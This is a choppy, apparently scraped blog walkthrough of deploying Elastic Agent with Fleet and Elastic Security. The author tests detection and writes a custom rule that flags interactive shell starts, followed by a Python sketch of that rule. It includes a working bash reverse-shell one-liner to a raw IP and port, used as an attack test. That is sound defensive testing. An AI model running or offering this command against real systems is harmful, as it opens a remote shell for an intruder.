30 GB storage | 1 GB RAM | Up to 2.5 vCPU in the hot data tier to something as high as
3000 TB storage | 1.88 TB RAM | 240 vCPU in the frozen data tier. We can also set the availability zone for each configuration.
Elastic Security integrates the free and open Elastic SIEM with Endpoint Security to prevent, detect, and respond to threats. To begin, you’ll need to add security solution related data to the Elastic Stack.
`elastic-agent` in our PATH.
`/opt/Elastic/Agent`. This directory contains all the necessary files for the standalone Elastic Agent to run.
`fleet.yml`. In our case, since we enabled Fleet, the
`elastic-agent.yml` only contains the information that Fleet is enabled (the configuration is managed centrally by Fleet). The
`fleet.yml` contains the information about the agent and the Fleet credentials.
`data` directory, it contains the currently running
`elastic-agent` software, which is
`elastic-agent` executable at the root path is symlinked to the executable in this directory.
`downloads`, we can see the downloaded tar archives. In
`install`, we can see the portable
`data/elastic-agent-054e22/state.yml`, we can see the configuration from Fleet.
`auditd` integration beforehand, so we can see that the
`auditd` logs are collected as
`inputs` in our agent policy. However, I see that the
`auditd` process is not running on my agent, which means that Elastic Agent does not concern itself with making sure that auditd is running. In my case, I need to run
`apt install auditd` so this log exists:
`Default` policy to our agent-01.
`elastic-agent` are no longer working on my agent.
`bash -i >& /dev/tcp/184.108.40.206/1337 0>&1`. After executing this command, we didn't see any alerts. We are able to see our bash exec process in the event list, but it didn't trigger any alert, which is disappointing.
`network start` with the destination of our evil server. Sadly, this does not generate an alert either.
`logs-endpoint.events.*` with the following query:
`process.args` value is only
`process.args`, who really uses the
`-i` flag for a legitimate action anyway? But alas, we cannot modify the prebuilt rule, so let's just create a new one.
`Preview results` to quickly test our query. In the screenshot above, we can see that it matches 14 events, which seems correct. Then, we need to define the rule name, description, severity and risk score. We can also define a MITRE ATT&CK™ reference, which is nice for further analysis. Then, we can set how often this rule runs (e.g. every 1 minute), and what action is taken when a threat is detected (e.g. send an email or call a webhook, though this is limited to paid licenses).
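To make the detection logic of the custom rule above concrete, here is an added example (not from the original post) that applies the same condition, an interactive-shell flag in `process.args` on a process start event, to a few constructed ECS-style endpoint events. The field names follow ECS (`event.category`, `event.type`, `process.name`, `process.args`); the shell list and the sample events are assumptions made for this example.

```python
# Constructed ECS-style endpoint process events for this example
# (not real data from the post). process.args is the argv list.
SAMPLE_EVENTS = [
    # the reverse shell from the post: redirections are handled by the
    # parent shell, so the child's argv is only ["bash", "-i"]
    {"event": {"category": ["process"], "type": ["start"]},
     "process": {"name": "bash", "args": ["bash", "-i"]},
     "host": {"name": "agent-01"}},
    # benign non-interactive shell invocation
    {"event": {"category": ["process"], "type": ["start"]},
     "process": {"name": "bash", "args": ["bash", "-c", "ls -la"]},
     "host": {"name": "agent-01"}},
    # same args, but an end event: the rule keys on starts only
    {"event": {"category": ["process"], "type": ["end"]},
     "process": {"name": "bash", "args": ["bash", "-i"]},
     "host": {"name": "agent-01"}},
    # "-i" used by a non-shell binary: not in scope for this rule
    {"event": {"category": ["process"], "type": ["start"]},
     "process": {"name": "python3", "args": ["python3", "-i", "app.py"]},
     "host": {"name": "agent-01"}},
]

# Assumed set of shells the rule cares about.
SHELLS = {"bash", "sh", "dash", "zsh"}


def is_interactive_shell_start(event: dict) -> bool:
    """Roughly the KQL `process.name:(bash or sh or dash or zsh) and
    process.args:"-i"` restricted to process start events (assumed query)."""
    ev = event.get("event", {})
    proc = event.get("process", {})
    if "process" not in ev.get("category", []) or "start" not in ev.get("type", []):
        return False
    if proc.get("name") not in SHELLS:
        return False
    # Match "-i" as a whole argument (argv[1:]), never as a substring,
    # so e.g. "-init" or a script path containing "-i" does not fire.
    return "-i" in proc.get("args", [])[1:]


def run_rule(events: list) -> list:
    """Return the events that would raise an alert under this rule."""
    return [e for e in events if is_interactive_shell_start(e)]


if __name__ == "__main__":
    for hit in run_rule(SAMPLE_EVENTS):
        print("ALERT", hit["host"]["name"], " ".join(hit["process"]["args"]))
```

Only the first sample event fires; the benign `bash -c`, the process end event, and the `python3 -i` start are all excluded.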
`metricbeat` processes. As for CPU, on average around 2% of 2 vCPUs is used.